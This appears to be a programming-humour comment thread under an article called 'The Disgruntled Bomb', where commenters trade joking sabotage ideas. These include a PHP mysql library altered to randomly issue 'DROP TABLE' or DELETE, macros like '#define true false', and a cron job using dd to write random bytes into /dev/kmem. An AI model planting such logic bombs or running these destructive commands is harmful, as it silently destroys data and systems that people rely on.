    Why not recompile a version of PHP's mysql libraries that when mysql_query is ran and it finds a select command, instead of select, one out of 10,000(For really busy systems, might be too low by a few orders of magnitude, let's say, 10,000,000,000 runs), it sends "DROP TABLE $table" instead?

    Or maybe just replace the word SELECT with DELETE (it can be done without copying since both have the same length).

    I have always liked the concepts of occasionally randomly deleting small things like customer order records, customer line items, modifying part numbers, decreasing order quantities, delaying delivery dates...

    Preferrably just before routine exit, when the user is done with that record, and won't be looking at it for some time to come... hopefully long enough for the changes to propagate throughout the backups....

  • Amadeus Schubelgruber (unregistered)

    There are a few static analyzers/checkers for C++ such as PRQAC++ that can detect redefinitions of reserved words, types, std lib, stl etc. Most if not all of these techniques can be easily detected.

  • HQM (unregistered)

    #define struct union

  • (cs) in reply to I use grep
    I use grep:
    "rumor has it that a disgruntled employee once left #define true false in a random header file in the codebase. Given our codebase, that would be a lot harder to debug than one might think."

    If you can't run a grep -r "true.*false" * or similar on your codebase...I'm sorry.

    Please let this be a (very bad) joke. He didn't say he couldn't "find where he put it". It was very difficult to debug. To find out that it actually HAD been done.

  • Bishiboosh (unregistered) in reply to Cipri
    Cipri:
    I'd have to go with making a cronjob running
    dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
    

    Replace a random bit of kernel memory with a random value.

    Except /dev/kmem isn't usable anymore in most of the recent distribs :'(

  • Paula (unregistered)

    function paula() { if (Math.random() > .5) return "Awesome"; else return "Awesomer"; }

Leave a comment on “The Disgruntled Bomb”

Log In or post as a guest

Replying to comment #:

« Return to Article